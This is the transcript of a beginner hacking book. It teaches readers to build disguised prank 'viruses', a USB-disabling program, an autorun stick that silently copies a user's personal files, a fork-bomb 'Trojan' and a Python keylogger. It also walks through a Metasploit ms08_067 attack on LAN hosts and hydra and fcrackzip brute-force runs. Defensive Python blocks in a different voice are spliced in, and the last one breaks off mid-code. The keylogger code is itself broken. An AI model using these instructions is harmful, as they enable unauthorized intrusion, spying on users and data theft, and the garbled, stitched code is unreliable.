A Hacker's Life Starter - Benjamin James


Transcript of A Hacker's Life Starter - Benjamin James

Dedication
Acknowledgments
About the Author
Introduction
    To who is this book aiming?
    How to use the book
Chapter 1 Defining a Hacker
    Who are hackers
    What motivates hackers
    Becoming a hacker
    Don't ever go against the rules
    Small summary ahead
Chapter 2 The Hacker's Tools
    Backtrack
        BackTrack's tools are organized into 12 categories
    Wireshark
        How it works
    Vidalia TOR
        Battle against Tor
        How it works
    Getting familiar with viruses
        Top 5 destructive computer viruses in History
    Keylogger
        How it works
    Small summary ahead
Chapter 3 Creating virus
    Building your first virus file
    Creating a virus to disable USB ports
        Setting up Borland C++
        Creating the C file that blocks usb ports
        Creating virus that unblocks the USB ports
    Virus nested in the stick
    Getting started with Trojan
        These actions can include
        Trojan backdoor
    Make a simple Trojan Horse
    Small summary ahead
Chapter 4 Cracking passwords
    Types of passwords
    Basic administrator password reset
    Cracking the encrypted PDF
    Bypass windows Password
    Custom Made Keylogger
    Small summary ahead
Chapter 5 In Depth with Backtrack
    History of backtrack
    Installing backtrack
    Metasploit using backtrack
        Metasploit Terms
        Performing Metasploit to Penetrate Users in LAN
    Cracking Router Admin Pass and username
    Breaking .rar & .zip using Backtrack
    Doing some Script in BT
    Backtrack was revolutionized to Kali
        Key features
        Which one should I use?
    Hack in Smartphones
    Small summary ahead
Chapter 6 Website Hacking
    History of SQL injection
    Understanding SQL-injection
    Simple SQL-injection
    Doing a SQL-injection
    Introduction to Phishing
    Performing Phishing
    Writing the Email
    Small summary ahead
Chapter 7 Denial of Service in Depth
    What is Denial of Service
    How DoS works
    Building a DoS Attack
    DoS On a DNS
    Small summary ahead
Chapter 8 Wireless hack
    How security wifi is encrypted
    Tools to crack a wifi
    Cracking WEP wireless password
    Crack Wi-Fi passwords in Windows
    Bypassing MAC Address filters
    Small summary ahead
Chapter 9 Defending from Hackers
    Protect yourself against DoS attacks
    Protecting the site
    Best tool to remove the virus
    Securing your operating system
    Securing your wireless
    Small summary ahead
Sad to say Farewell!

Dedication

This book is dedicated to my beloved grandma and mother, who taught me to never give up in any circumstances, and for making me the great man that I'm now.

Acknowledgments

To make it clear, I would like to give a warm gratitude to myself, who invented this book, and also to the forums around the globe that gave good feedback on this book as well; the backtrack/kali community that fetched me the information on Freenode; a friend in California who knew everything about network security and gave me enough information; and my editor, who polished the book for me; without him this book would not have existed at all.

About the Author

Benjamin James has an IT degree and worked as a software developer at a company for years. He has also helped many people with security problems and their computers. He knows how to twist the languages C++, Java, C# and Visual Basic with no ease. Also, he enjoys hacking his own computers from time to time to see how it goes. He has made thousands of articles for the World Wide Web teaching various subjects. And in his free time, when his head is not in IT, he enjoys making 3D graphics. Currently, he's making a huge software. He is also writing 2 novels and a short film.

Introduction

Awesome for choosing A Hacker's Life Starter. This book covers the most essential tools and information that a computer hacker needs to know these days. Most of the exercises inside this book are things you need to apply in your everyday hacking life. That's why I gathered all the information around the world for these past months to put it inside this book.

I'm not saying that there is no information out there on the internet or in other books, but what I'm saying is that in this book I won't let you waste your precious time reading, but only gain from it.

To who is this book aiming?

Cyber-crime and hacking into someone else's computer is completely against the rules. No country around the world accepts this crime, and if it has passed inside your head to do so, you will need to carry the consequences yourself. I won't be responsible for the acts you choose to perform using my book.

But that doesn't mean you can't apply things from my book in real life. You see, the things that I teach inside this book are for those who want to exceed their limits and understand better how the computer works, and also for those who want to do it for the fun of it or for educational purposes.

No matter if you didn't know anything about computers, or you know just a little bit, or even if you know everything about computers and their software, this book is for you.

How to use the book

As mentioned before, this book is made only to be used on your own computers and so on (educational purposes only). It's easy to read; you can navigate to any chapter you want depending on your needs, but if you want to read it in order, that would be even better. At the end of each chapter there is a quick summary you can go through so that you can keep things fresh in your brain.

There are some universities around the globe that started teaching how to hack. So if you're attending one of them and you grabbed this book at some store, that means you have a full advantage on getting high scores.

Chapter 1 Defining a Hacker

We will cover:

* Who are hackers

* What motivates hackers

* Becoming a hacker

* Don't ever go against the rules

Hackers are simply people who engage in computer hack activities. Also called cyber-crime, it has to do with infiltrating a system or network, anything that has to do with storing a digital bulk of information. There are two kinds of hackers: white hat (good side) and black hat (bad side).

Hackers are advanced programmers who have great knowledge of both hardware and software. In the past, hackers were computer users who wanted to explore the world of computers more in depth. But nowadays hackers are called people who crack inside someone else's personal system and gain information (criminal hackers); the reasons why could be endless.

Who are hackers

White Hat

A white hat is a person who specializes in security. He uses hacking methods to find security flaws that a black hat may exploit.

Black Hat

A black hat is a person who tries to exploit computers for personal financial gain or other malicious reasons, mostly with bad intentions and to achieve something wrong. They are mostly called crackers.

What motivates hackers

There are many types of hackers. Some seek money, like counterfeiting passports, credit cards or hacking ATM numbers. Others seek freedom; in other words, they think that the internet should be completely free in every single aspect, or for their convenience. These hackers are mostly called Hacktivists.

And there are those who always try to impress their friends or hack them. These hackers may not be as professional as the others, but they still achieve what they want. They are known as Script Kiddies.

Of course there are those who just do it to test themselves, trying to push their knowledge as much as they can, hacking their own machines and telling others how they did it.

But the biggest reason why hackers are motivated to attack systems is for achieving technical challenges. For example, these black hatters may find it really challenging to create a virus that could affect billions of people.

Becoming a hacker

Becoming a hacker takes practice and dedication: training yourself in writing code and hacking with the necessary tools. These are the requirements you'll probably need to turn into a good hacker.

* Finding your motivation. If you don't have a solid purpose to hack a computer or a network, it will be harder for you to understand what to hack.

* No hacker is a hacker without their hacking tools. In becoming a hacker you will have to define which tools are not to be used in order to execute the malicious act.

* Picking up some network books is also essential if you want to hack into network structures.

* Choosing your programming language is also one of the greatest moves a young hacker can make. You see, there are all sorts of programming languages that can help you access or damage a computer.

Don't ever go against the rules

Hacking someone else's computer is obviously a violation. In desperation you might think that hacking inside a company or a person might solve your personal troubles. Indeed, it might, but you will have to remember that security (white hats) will always eventually find the source.

Not only because of that. Close your eyes and put yourself inside someone else's shoes, and imagine they are accessing your computer and formatting your PC or robbing an important file from you. That wasn't so funny, right?

That's why we recommend that you think twice before performing a malicious act.

In the law there are many kinds of penalty for those who are willing to lose three to fifteen years or more of their life.

Small summary ahead

* A white hat hacker breaks security for non-malicious reasons, perhaps to test their own security system.

* A black hat hacker is a hacker who violates computer security for little reason beyond maliciousness or for personal gain.

* Hacktivism is the act of hacking, or breaking into a computer system, for a politically or socially motivated purpose.

* But the biggest reason why hackers are motivated to attack systems is for achieving technical challenges.

* Hacking is not tolerated and might let you end up inside prison for years.

Chapter 2 The Hacker's Tools

We will cover:

* Backtrack

* Wireshark

* Vidalia Tor

* Getting familiar with viruses

* Keylogger

A hacking tool is a program designed to help with hacking, or software which can be used for hacking achievements. Most of these programs are open source. You can download them for free at their web site and use them for experimenting.

In this chapter we will do a light introduction to a few of the most recognized and strong hacking tools. Just try to get familiar with them as much as you can. Each time you master one of these tools in the future, you will increase your skills as a white/black hat hacker.

Backtrack

In this book we will use Backtrack as much as we can because it offers a number of methods for cracking inside a system with ease. Backtrack is an open source operating system that can be booted from a live CD or USB without requiring installation. Also, permanent installation to the network or HDD is easily achievable. In chapter 5 we will cover Backtrack more in depth, and its use for sniffing and cracking inside systems (see Figure 2-1).

Backtrack already comes with a number of hacking tools or security tools installed inside the OS. Backtrack is well known for cracking and hacking on computers.

BackTrack's tools are organized into 12 categories:

* Information Gathering

* Vulnerability Assessment

* Exploitation Tools

* Privilege Escalation

* Maintaining Access

* Reverse Engineering

* RFID Tools

* Stress testing

* Forensics

* Reporting Tools

* Services

* Miscellaneous

Figure 2-1 shows you how Backtrack will look while searching for packets.

Wireshark

Wireshark is another tool used to sniff WIFI/online account passwords and packets out there. Basically what it does is capture packets from connections inside the network. And it can be used for security.

This small software is completely open source and can be downloaded at http://www.wireshark.org. Wireshark was made for network troubleshooting and communications protocol development.

How it works

It's a network analyzer, like a measuring device for examining inside a network cable in real time (see Figure 2-2).

Figure 2-2 shows you Wireshark analyzing the network LAN, which can be used later to pick passwords.

Vidalia TOR

Tor is the world's largest free anonymity service. It is used by common people, hackers and tech-security. With Tor you can easily hide your identity from others. It can be downloaded at www.torproject.org

For example, if you actually lived in the United States and you hacked or accessed another user's PC with Tor turned on, and that user managed to track you back by your IP address, he would find out that you live in China or any other country. What I am trying to say is that Tor cloaks your IP for you, fooling anyone else who's tracking your location.

Battle against Tor

The NSA has reportedly been trying to break into the Tor network for years. But Tor kept going and providing their service up until this moment, because it seems Tor is really difficult to crack down.

They did manage to get some information out of it (a small number of nodes), but it still wasn't enough.

How it works

Tor routes internet traffic through several onion servers. From this you get provided with anonymity. In the Tor configuration file, applications can be directed to the Tor network through a SOCKS proxy at localhost (see Figure 2-3).

Figure 2-3 shows Tor turned on, providing the great service.

Getting familiar with viruses

Creating a computer virus, or understanding it, is one of the most essential tools that a hacker could ever have achieved. You see, a virus cannot only be used to damage the computer, but it also can be used to monitor or take screenshots of the infected operating system remotely. And on the other hand it can be used to fix things.

Top 5 destructive computer viruses in History

Here are the top five viruses that I think shook the world:

* Melissa

* MYDoom

* Storm

* ILOVEYOU

* Code Red

In the next chapter we will go a bit more in depth into how a virus is made and how to make one.

Keylogger

Knowing how to work with a keylogger is also useful, especially when you will need to monitor users' passwords. Basically key loggers are used in IT organizations to find technical problems. But there are those who use them for sniffing users' passwords and other things.

How it works

The word says it for itself: it logs keyboard keystrokes into a file, so they can be found out later. Most keyloggers store the data inside the local hard drive. But there are some that send it through the internet or the network remotely (see Figure 2-4).

Figure 2-4 shows you how Backtrack will look while searching for packets.

Small summary ahead

* Backtrack comes with a number of hacking and security tools already installed with the OS.

* Wireshark is mostly used for capturing packets from the network to have a detailed look over it; still, it can be used for hacking.

* Tor cloaks your IP and with that it makes it difficult for them to find the real IP.

* Keylogger is used to monitor what the user is typing on his keyboard.


Chapter 3 Creating virus

We will cover:

* Building your first virus file

* Creating a virus to disable USB ports

* Virus nested in the stick

* Getting started with Trojan

* Make a simple Trojan virus

Virus is the key for making a hacker's dream come true in many ways. In the last chapter we spoke a little about viruses, but in this chapter we will cover more about them, and in the end you will understand how to make one and how it operates.

Building your first virus file

Here you will create your first virus using Notepad. The task of the virus that we will be creating is to shut down the operating system, and it will be cloaked in a game icon. Give this virus to someone who can handle this prank.

1. Start by opening Notepad for the text: Start->All Programs->Accessories->Notepad

2. Type this piece of code in Notepad:

    @echo off
    echo Message here.
    shutdown -s -f -t 60 -c "type a message you want to appear here"

3. Save the file as play this 3D game.bat, change the Save file type when saving to All Files, and then save (see Figure 3-1).

Figure 3-1 shows you the Notepad Save dialog opened and the file type changed.

4. Go to the desktop and create a new shortcut, locate the bat file, then Next.

5. Name it play this 3D game and Finish.

6. Right click the shortcut->Properties->Change Icon->choose one, then OK.

Here the fake game app we created should be a virus that shuts down the user's PC in a few seconds. And that's how you created your very first virus by just using Notepad.

Creating a virus to disable USB ports

The second virus you will need to create is to disable all USB ports of the computer. Here you will need to compile a C file into an executable one, meaning you will need to convert the .c into a .exe file.

Setting up Borland C++

1. First off, you need to download Borland C++ 5.5 or above.

2. After you install the Borland C++ compiler, create two new text documents in Notepad.

3. Type these first two lines in the first txt file:

    -Ic:\Borland\Bcc55\include
    -Lc:\Borland\Bcc55\lib

4. Save changes and close the file. Now rename the first file to bcc32.cfg.

5. In the second text file document type this:

    -Lc:\Borland\Bcc55\lib

6. Save changes and close the file. Now rename the second file to ilink32.cfg.

7. Put the two files in this directory: C:\Borland\BCC55\Bin

Creating the C file that blocks usb ports

1. Open Notepad, type the code and save it as block_usb.c

    #include <stdlib.h>

    void main()
    {
        /* Set the USBSTOR service start type to 4 (disabled) so USB storage devices are no longer loaded. */
        system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR /v Start /t REG_DWORD /d 4 /f");
    }

2. Place the file in C:\Borland\BCC55\Bin

3. Now open command prompt (Start->Run->type cmd)

4. Type in:

    cd C:\Borland\BCC55\Bin

5. Now compile the file by typing:

    bcc32 block_usb.c

Creating virus that unblocks the USB ports

Now that you're done, you should have a block_usb.exe file in the folder that hopefully blocks all the USB ports.

1. To enable all the USB ports back again, you should replace the code in the block_usb.c file with this and compile again:

    #include <stdlib.h>

    void main()
    {
        /* Start type 3 (manual) is the Windows default for USBSTOR, so storage devices load again. */
        system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\USBSTOR /v Start /t REG_DWORD /d 3 /f");
    }

Virus nested in the stick

All the time I see a virus launching from a stick and starting to infect the computer. That I find really lame. What if you can make a virus launch from the stick and make it copy files to the stick silently? Won't that be more useful? Well, today I'll show you how to make one of those.

1. Insert your USB in the computer and navigate into it.

2. Create an empty text file in the root folder of the stick and, once you're done, open it. Type this code:

    [autorun]
    icon=drive.ico
    open=launch.bat
    action=Are you sure you want to run the game for windows?
    shell\open\command=launch.bat

3. OK, that's it; save the file with a .inf extension.

4. Choose an appealing icon for the file and that's it.

5. Create another text file and type this in it:

    @echo off
    :: variables
    /min
    SET odrive=%odrive:~0,2%
    set backupcmd=xcopy /s /c /d /e /h /i /r /y
    echo off
    %backupcmd% "%USERPROFILE%\pictures" "%drive%\backup\My pics"
    %backupcmd% "%USERPROFILE%\Favorites" "%drive%\backup\Favorites"
    %backupcmd% "%USERPROFILE%\videos" "%drive%\backup\vids"
    @echo off
    cls

6. When you're done, save it as something but give it the extension .bat

7. We are almost done. Open another empty text file and type this:

    CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

8. Give the file a name (I did hidden) and save it with the extension .vbs

9. Now this is the last step. Like always, create & open a text file and type this:

    wscript.exe \invisible.vbs file.bat

10. When you're done, save the file as initiate with the extension .bat

11. Last but not least, create a folder in the stick next to the other files and name it backup

12. Now it should be done. Pull out the stick from the computer and insert it again, and the autoplay window should pop up. Then click on Run (see Figure 5-8).

Figure 5-8 shows you how the script is running in the terminal.

Note: It might give you an error message, but that's OK; all the files were copied to the folder or they are being copied.
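What a defender does with a drive like this is read its autorun.inf before trusting it. The following Python is an added example, not code from the book: it parses the [autorun] section, lists which entries would launch a program, and flags launch targets that are scripts or executables or that are missing from the drive. The sample autorun text repeats the one above; the file listing, the key list and the wording of the findings are my own assumptions.

```python
"""Triage an autorun.inf from a removable drive (added example, not the book's code).

The stick procedure above relies on an autorun.inf whose open= and
shell\\open\\command= lines point at a batch file, and whose action= line
controls the text the AutoPlay prompt shows. Parsing the file and reporting
what it would launch is the check a defender makes before trusting a drive.
The sample autorun text reproduces the one in the procedure; the file listing
and the finding messages are constructed.
"""
import os

# Keys Windows treats as "run this when the drive is opened" (assumed list).
LAUNCH_KEYS = ("open", "shellexecute", "shell\\open\\command")
# Extensions that mean code runs rather than a document being opened.
CODE_EXTENSIONS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".vbe",
                   ".js", ".jse", ".wsf", ".wsh", ".ps1"}

# The autorun.inf from the procedure above.
SAMPLE_AUTORUN = """\
[autorun]
icon=drive.ico
open=launch.bat
action=Are you sure you want to run the game for windows?
shell\\open\\command=launch.bat
"""


def parse_autorun(text):
    """Return the key/value pairs of the [autorun] section with lower-cased keys."""
    entries = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                      # blank or comment line
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def first_token(command):
    """Program name from a command line, honouring a quoted name with spaces."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(None, 1)[0] if command else ""


def launch_targets(entries):
    """(key, program) for every entry that would execute something."""
    return [(key, first_token(entries[key])) for key in LAUNCH_KEYS if key in entries]


def triage(text, files_on_drive):
    """Human-readable findings for one autorun.inf plus the drive's file names."""
    entries = parse_autorun(text)
    present = {name.lower() for name in files_on_drive}
    findings = []
    targets = launch_targets(entries)
    for key, program in targets:
        if os.path.splitext(program)[1].lower() in CODE_EXTENSIONS:
            findings.append(f"{key}= runs code from the drive: {program}")
        if program.lower() not in present:
            findings.append(f"{key}= points at {program}, which is not on the drive")
    if targets and "action" in entries:
        # The prompt text the user sees is written by whoever prepared the drive.
        findings.append(f"AutoPlay prompt text is supplied by the drive: {entries['action']!r}")
    return findings


if __name__ == "__main__":
    # Constructed file listing for the sample drive.
    for finding in triage(SAMPLE_AUTORUN, ["autorun.inf", "launch.bat", "drive.ico"]):
        print("-", finding)
```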

Getting started with Trojan

Most of us might think, or some, that a Trojan is a virus, but it's not. A Trojan is just like any other program, also called malware, but one that performs malicious functions such as creating damage to the computer. They do not have the ability to replicate themselves like a virus. But with a Trojan you can control a computer remotely and execute a virus in the computer.

These actions can include:

* Deleting data

* Blocking data

* Modifying data

* Copying data

* Disrupting the performance of computers or computer networks

Trojan backdoor

A backdoor Trojan gives malicious users remote control over the infected computer. They enable the author to do anything they wish on the infected computer, including sending, receiving, launching and deleting files, displaying data, and shutting down the computer.

Make a simple Trojan Horse

Now we will create a Trojan virus that keeps opening command prompt 40x to 1000x times, depending on how many times you type start. The user can't easily stop them from opening. But if they have an antivirus, the virus file can be detected.

1. Open Notepad, write start 50 times or much more, then save it as test.bat and test it in VirtualBox.

2. Make sure you don't have an antivirus in the VirtualBox operating system. Now your antivirus should detect this bat file. If not, this could fill the user's memory.

    @echo off
    :A
    start
    start
    start
    start
    start
    start
    start
    goto A

Small summary ahead

* There are viruses that can be used to shut down a computer

* Viruses can be used to disable USB ports

* A Trojan is not a virus but a program that performs maliciously

* Backdoors are Trojans that have control over the user remotely

* Viruses can be used to transfer files to the stick


Chapter 4 Cracking passwords

We will cover:

* Types of passwords

* Basic administrator password reset.

* Crack the encrypted pdf

* Bypass windows password

* Custom made keylogger

Password cracking doesn't have to involve fancy tools, but it's a fairly tedious process. If the target doesn't lock you out after a specific number of tries, you can spend an infinite amount of time trying every combination of alphanumeric characters. It's just a question of time and bandwidth before you break into a system.

Types of passwords

Dictionary - A file of words is run against user accounts, and if the password is a simple word, it can be found pretty quickly.

Hybrid - A common method utilized by users to change passwords is to add a number or symbol to the end. A hybrid attack works like a dictionary attack, but adds simple numbers or symbols to the password attempt.

Brute force - The most time-consuming, but comprehensive, way to crack a password. Every combination of characters is tried until the password is broken.
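The paragraph above turns on one control: locking the account after a number of failures. The following Python is an added example, not code from the book: it models such a lockout and feeds it the three guess strategies the chapter lists, showing how many guesses get through before the lock engages. The account, the word list, the fake clock and the threshold values are constructed for illustration.

```python
"""Login guard with account lockout (added example, not the book's code).

Without a lockout after some number of failed tries an attacker can keep
guessing forever; with one, a dictionary, hybrid or brute-force run is cut
off after a handful of attempts. The account database, word list and clock
are constructed; MAX_FAILURES and LOCKOUT_SECONDS are illustrative values.
"""
import itertools
import string
from dataclasses import dataclass

MAX_FAILURES = 5          # consecutive failures allowed before locking
LOCKOUT_SECONDS = 900     # how long the account stays locked (15 minutes)


@dataclass
class Account:
    password: str            # plaintext only for this simulation; real systems store a hash
    failures: int = 0
    locked_until: float = 0.0


class FakeClock:
    """Deterministic clock so the lockout can be exercised without sleeping."""

    def __init__(self, start=0.0):
        self.now = start

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


class LoginService:
    def __init__(self, accounts, clock):
        self.accounts = accounts
        self.clock = clock

    def login(self, user, password):
        """Return 'ok', 'denied' or 'locked'."""
        acct = self.accounts.get(user)
        now = self.clock()
        if acct is None:
            return "denied"          # same reply as a wrong password: don't reveal valid usernames
        if now < acct.locked_until:
            return "locked"          # refused even when the password is right
        if password == acct.password:
            acct.failures = 0
            return "ok"
        acct.failures += 1
        if acct.failures >= MAX_FAILURES:
            acct.failures = 0
            acct.locked_until = now + LOCKOUT_SECONDS
        return "denied"


# The three guess strategies the chapter names, kept deliberately small.
def dictionary_guesses(words):
    yield from words


def hybrid_guesses(words, suffixes=range(100)):
    for word in words:
        for n in suffixes:
            yield f"{word}{n}"


def brute_force_guesses(max_len, alphabet=string.ascii_lowercase):
    for length in range(1, max_len + 1):
        for combo in itertools.product(alphabet, repeat=length):
            yield "".join(combo)


def guesses_until_locked(service, user, guesses):
    """Feed guesses until the account answers 'locked'.
    Returns (number of guesses actually evaluated, whether the password was found)."""
    tried = 0
    for guess in guesses:
        result = service.login(user, guess)
        if result == "locked":
            return tried, False
        tried += 1
        if result == "ok":
            return tried, True
    return tried, False


if __name__ == "__main__":
    clock = FakeClock()
    service = LoginService({"alice": Account("sunshine42")}, clock)
    words = ["password", "sunshine", "letmein"]     # constructed mini word list
    for name, stream in [("dictionary", dictionary_guesses(words)),
                         ("hybrid", hybrid_guesses(words)),
                         ("brute force", brute_force_guesses(4))]:
        clock.advance(LOCKOUT_SECONDS)             # let any previous lock expire
        print(name, guesses_until_locked(service, "alice", stream))
```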

Basic administrator password reset

1. Go to Start->open Run-> then write cmd. Or Start-> and search for command prompt, then Enter.

2. To view the available users inside the operating system (see Figure 4-1), type in:

    net user

Figure 4-1 shows you the users inside the computer in cmd.

3. Now type:

    net user Administrator *

You write net user again and the administrator account; this time it's Administrator.

4. Then type in the new password twice. After that it should be OK for you to enter the administrator account with the new password.

Cracking the encrypted PDF

Removing passwords from pdf files can sometimes be frustrating, especially when you lost a password or you found it free somewhere. A-PDF Restrictions Remover is a great tool for cracking the password. It is free to download and can be found in Google (if you enter the exact name) (see Figure 4-2).

Figure 4-2 shows you how A-PDF Restrictions Remover looks when it's running.

1. When you download and install A-PDF Restrictions Remover, you should be able to right click the restricted pdf file and choose Remove Restrictions or Remove Restriction & Save as..

Bypass windows Password

Bypassing the windows password has become one of the most common things in the IT industry and in normal life, maybe because you lost your password or you found the PC for free thrown in the streets and you need the password to proceed in the computer.

Here I will show you a way to bypass the windows password using a USB stick or CD.

1. Go to this link: http://ophcrack.sourceforge.net/download.php and download ophcrack LiveCD -> Burn the iso.

2. Reboot the computer and boot it from the cd and choose Ophcrack LiveCD Graphics mode (automode) (see Figure 4-2).

Figure 4-2 shows you Ophcrack LiveCD running from the cd or stick.

3. When it loads and opens, it will ask you which partition to open. Type 0

4. Wait for a moment and the cracked password will appear next to the protected user (see Figure 4-3).

Figure 4-3 shows you how Backtrack will look while searching for packets.

Custom Made Keylogger

A keylogger doesn't actually crack a password, but it monitors what passwords the victim is typing. Let's see how to program a keylogger.

1. Start by navigating to python.org. There, in the download section, download the latest version of python (see Figure 5-8).

Figure 5-8 shows you how the script is running in the terminal.

2. Once it has finished downloading, go to http://sourceforge.net/projects/pyhook/files/ and download the latest version. Now install it.

3. Now navigate to www.sourceforge.net/projects/pywin32, download it and install it.

Note: All of these tools need to be of the same version in order for them to work properly. pyHook 1.5.x requires python 2.7.

4. Now launch the IDLE (Python GUI) by searching the name in Start, and the python shell will launch itself.

5. Type this python code inside the app:

    import win32api
    import win32console
    import win32gui
    import pythoncom, pyHook

    win = win32console.GetConsoleWindow()
    win32gui.ShowWindows(win, 0)

    def OnKeyboardEvent(event):
        if event.Ascii == 5:
            _exit(1)
        if event.Ascii != 0 or 8:
            f = open('c:\output.txt', 'w')
            buffer = f.read()
            f.close()
            f = open('c:\output.txt', 'w')
            keylogs = chr(event.Ascii)
            if event.Ascii == 13:
                keylogs = '/n'
            buffer += keylogs
            f.write(buffer)
            f.close()

    hm = pyHook.HookManager()
    hm.KeyDown = OnKeyboardEvent
    hm.HookKeyboard()
    pythoncom.PumpMessages()

6. Save the file as my_own_keylogger.py and launch it.

7. Now that your self-made software is running, you can start testing it by going to your email account or any other account and entering your username and password.

8. When you think you have enough information, press Ctrl+I to stop the app.

9. Go to the output.txt file and examine it to see what you retrieved.

Note: In our case we saved the output.txt in the C drive root folder.

Small summary ahead

* A-PDF Restrictions Remover is a tool for cracking the password of a PDF

* Ophcrack is the best software used to bypass the windows password

* There are three types of password cracking: Dictionary, Hybrid, Brute Force.

* A keylogger can be custom made using python

Chapter 5 In Depth with Backtrack

We will cover:

* History of Backtrack

* Installing backtrack.

* Metasploit using backtrack

* Cracking router admin pass and username

* Breaking .rar & .zip using backtrack

* Doing some script in BT

* Backtrack was revolutionized to Kali

* Hack in smartphones

Backtrack is the number #1 penetration hacking operating system that's out there for your experiments and fun stuff. It basically gathers all the tools necessary to hack and do some security with devices, files, operating systems, software and websites.

History of backtrack

Backtrack originated from two distributions and its intention was penetration testing. Mati Aharoni, a security consultant, developed WHAX, a Linux based distribution.

Max Moser made a Live CD based on Knoppix which included over 300 tools, organized. And Backtrack itself is a combination of Knoppix and WHAX.

Installing backtrack

Backtrack is an operating system that can either run from a Live CD or be installed on the hard disk. Both options have their advantages: one can be used quickly as temporary space on the HDD, and the other can permanently stay on the HDD and be used anytime. We will be using VirtualBox to install Backtrack.

1. Boot the Backtrack iso in VirtualBox (recommended to use 30 GB and 1.5 GB RAM).

2. Press Enter on Backtrack Text - Default Boot Text Mode (see Figure 5-1).

Figure 5-1 shows you how the Backtrack live cd menus look.

3. Now in the bash prompt window type in:

    startx

4. And hit Enter to open the graphical user interface of the operating system.

5. Now to start installing we need to double click Install Backtrack on the Desktop.

6. Choose your language (then Forward), select your region and time zone (Forward), leave the checkbox on "erase and use the entire disk" and then click on Install.

When it has finished and restarted, the login command screen will appear like this (see Figure 5-2).

Figure 5-2 shows you the login section of Backtrack.

7. Fill in the login: root

8. Fill in the password: toor

9. And to start Backtrack to the desktop write: startx

Metasploit using backtrack

Did it ever pass through your thick skull what a hacker could do by just knowing your IP address? Yes, he could get complete access to your computer with no ease. Well, it takes just a couple of minutes, maybe for the simple reason that the victim didn't update one of his software's.

Metasploit is the hacker's best friend. It is one of the most powerful ways for hacking into others. It's easy, fast, and always works. We will use our companion Backtrack for the Metasploiting.

Metasploit Terms

Vulnerability / Information Disclosure (a weakness inside the system)

Exploit (software that takes advantage of the vulnerability)

Overflow (error when a program tries to store too much data)

Payload (code or program that runs on the system after exploitation)

Shellcode (code used as a payload)

Performing Metasploit to Penetrate Users in LAN

1. First off, run Backtrack to the desktop and open the terminal app. From there type in:

    cd /pentest/exploits/framework3

If that doesn't work, try this one:

    cd /pentest/exploits/framework2

2. Once you're inside that directory, type in:

    svn update

What this does is it lets you ensure you have the latest version of MSF and Armitage.

3. Let's open the software called Armitage by typing in the terminal: armitage. And click Connect when the dialog pops up, and Yes to start the RPC server (see Figure 5-3).

Figure 5-3 shows you the Armitage dialog ready to start connecting.

4. Once it is open, change the DB Driver option to postgresql. Leave the DB Connect String the same and click Start MSF. It will start processing a few things to the web and open the software itself, which may look like this (see Figure 5-4).

Figure 5-4 shows Armitage running and ready for some Metasploiting.

5. Now go to Hosts->Nmap Scan->Quick Scan (OS detect). Here you can scan or import hosts in your network using Nmap (see Figure 5-5).

Figure 5-5 shows the Nmap Scan section I navigated to.

6. Enter the IP range you think the user might be in, for example from 30 to 40, and OK.

Look at this: 192.168.1.30/40, which means it will look for all the users from 30 to 40. The Nmap scanning could take some time, depending on the IP range in the network. Over here you can see the scan in progress. You can see all the ports of the OS in your network.

7. When it's finished a message will come up saying Scan is complete. Click OK.

8. And then you will see all the available host computers here. You can organize them by right clicking the gray area and Layout->Stack.

Now you'll need to find the attacks throughout the available ports on the hosts. When you do find the vulnerability, you can initiate an exploit on the computer to make a Meterpreter session.

9. Now go to: Attacks->Find Attacks->by port

10. Now right click on one of the computers you found earlier and go to: Attack->smb->ms08_067_netapi

11. When the Attack configuration pops up, leave the targets at 0=>Automatic Targeting. And then click Launch.

Wait for a few seconds and the host computer icon will turn reddish.

That means that a session is made on that host. Right now you can either take screenshots of the host computer or navigate in the folders. In other words, from this moment you have more privilege on the host than before.

12. To take a screenshot of the host computer, right click on the icon and: Meterpreter 1->Explore->Screenshot. And there you have it.

13. And to explore inside the victim's computer: Meterpreter 1->Explore->Browse Files.

Cracking Router Admin Pass and Username

Sometimes you might forget your router password, or you want to access the admin password; in that case Backtrack also has a tool to do so. Here I will walk you through how to sniff the router password step by step.

1. Run Backtrack to the desktop and then run the terminal.

2. Make sure you have gedit (gedit is a text editor) installed on your Backtrack.

Type in:

gedit

(If it's not installed, type in: apt-get install gedit)

3. Once gedit is open, save an empty file named passwd.lst inside the folder /code/ in root.

4. Type in:

dhclient eth0

It will give you a list of information. Note where it says:

DHCPACK of [your ip] from [router ip]

Your router IP is there; write that IP down somewhere so it can be used later.

5. Then type in the terminal:

hydra -l admin -P /code/passwd.lst -e ns -f -V [router ip] http-get /

And then press Enter.

Wait for a moment until the attack is finished. And there you have the password.

6. If you would like to test if it works, type in the terminal: firefox. That will launch Firefox.

7. In the URL bar type in: http://[your_router_ip]/

Fill in the username and password you found, and voilà! You're in. (see Figure 5-6)

Figure 5-6. Here I'm showing you how I hacked my own router and got into the control panel.

Breaking .rar & .zip using Backtrack

In chapter 3 we discussed how to remove passwords with many small programs. Now I'm going to show you how to break a zip password using Backtrack. First, have your secured compressed file on your Backtrack desktop.

1. What you would like to do now is go to

Start->Backtrack->Privilege Escalation->Password Attacks->Offline Attacks->fcrackzip (see Figure 5-7)

Figure 5-7. Here I'm showing you how I navigated to fcrackzip.

A terminal will open with the following options to choose from:

-b brute force
-D dictionary attack
-B benchmark
-c charset characterset
-h help
-V validate
-p init-password string
-l length min-max
-u use-unzip
-m method num
-2 modulo r/m

Here is how the chart works:

-b > brute force
-c a > charset: lower case alphabet
-l 1-6 > length of expected password

2. I'm planning to do a brute force right now, so I'll write:

fcrackzip -b -c a -l 1-6 "/root/Desktop/crack me.zip"

Now press Enter and Backtrack will quickly show you the password after a few attempts. But sometimes it may take years.
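The hydra run against the router and the fcrackzip run above are both guessing attacks, so what decides whether they finish in seconds or "take years" is the size of the search space and whether the password sits in a wordlist. The following Python estimate of worst-case guessing time is an added example, not code from the book: the sample wordlist, the guess rate and the weak/moderate/strong thresholds are all assumptions you should replace with your own numbers.

```python
import string

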